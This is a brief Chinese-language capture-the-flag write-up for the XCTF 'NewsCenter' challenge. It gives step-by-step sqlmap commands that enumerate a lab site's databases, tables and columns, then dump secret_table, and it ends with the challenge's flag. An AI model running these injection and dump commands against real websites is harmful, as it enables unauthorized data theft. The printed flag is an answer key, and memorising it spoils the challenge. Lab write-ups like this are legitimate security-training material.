XCTF：NewsCenter[WriteUP]

这题直接使用SQLMAP可以秒破

在该页面按F12查看元素，搜索search这个搜索框

目的是查看该搜索框的id

记住这里的id="sample3"，待会sqlmap需要使用到

---

使用命令直接查看该搜索框所在的库名

sqlmap -u 'http://61.147.171.105:52879/?id=sample3' --current-db 

上面的id前面一定要加上一个问号：?   不然会报错

如图所示：DBS：news

再次使用命令，查看该库下的表单

sqlmap -u 'http://61.147.171.105:52879/?id=sample3' -D news --tables

先查看secret_table里的东西

sqlmap -u 'http://61.147.171.105:52879/?id=sample3' -D news -T secret_table --columns

很显然直接就可以拿到flag了

使用--dump命令展示column中的数据

sqlmap -u 'http://61.147.171.105:52879/?id=sample3' -D news -T secret_table -C fl4g --dump

---

flag：QCTF{sq1_inJec7ion_ezzz}

最后，值得一提的是。在另一个名叫cyber的库

里面有一个假的flag，一开始在这里卡了下...